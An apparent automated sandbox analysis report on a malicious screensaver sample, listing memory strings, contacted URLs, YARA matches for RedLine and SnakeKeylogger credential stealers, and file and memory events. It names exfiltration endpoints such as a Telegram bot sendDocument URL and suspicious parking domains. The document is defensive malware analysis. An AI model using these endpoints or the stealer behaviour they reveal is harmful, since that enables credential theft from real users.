                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: Microsofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: Microsofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgX
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                  Source: armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: PO#_1100015533.scr, 00000000.00000002.386365175.0000000002931000.00000004.00000800.00020000.00000000.sdmp, hVVSnrrP.exe, 0000000A.00000002.577498436.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.401578021.0000000002141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OW
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640Cb
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccep
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=fwiwk.biz
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: Microsofts.exe, 0000000E.00000002.640161168.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189X
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://trkpcna.net/track.
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: armsvc.exe, 0000000B.00000003.602188957.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.393870874.0000000002470000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.391699512.0000000001F00000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.393845500.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.392632097.00000000023E0000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Drops large PE files
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.12.dr 665670656Jump to dropped file
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: PO#_1100015533.scr
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\SysWOW64\perfhost.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\68573a154f49b6de.bin
                  Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.log
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Microsofts.exe DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                  Source: ehrecvr.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: elevation_service.exe.11.drStatic PE information: Number of sections : 12 > 10
                  Source: PO#_1100015533.scr, 00000000.00000002.418062548.000000000A6EA000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.380436559.000000000089B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesctasks.exej% vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000000.355411706.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebcYK.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.402396004.0000000003553000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.402396004.00000000044EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.380436559.00000000007D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.379886354.0000000000790000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.387118499.00000000008C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: p,\\StringFileInfo\\040904B0\\OriginalFilename vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe* vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.380427536.000000000045A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scrBinary or memory string: OriginalFilenamebcYK.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: FlashPlayerUpdateService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SearchIndexer.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: aspnet_state.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: mscorsvw.exe1.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: mscorsvw.exe2.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: dllhost.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ehrecvr.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ehsched.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ieetwcollector.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: sppsvc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OSE.EXE.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FlashPlayerUpdateService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
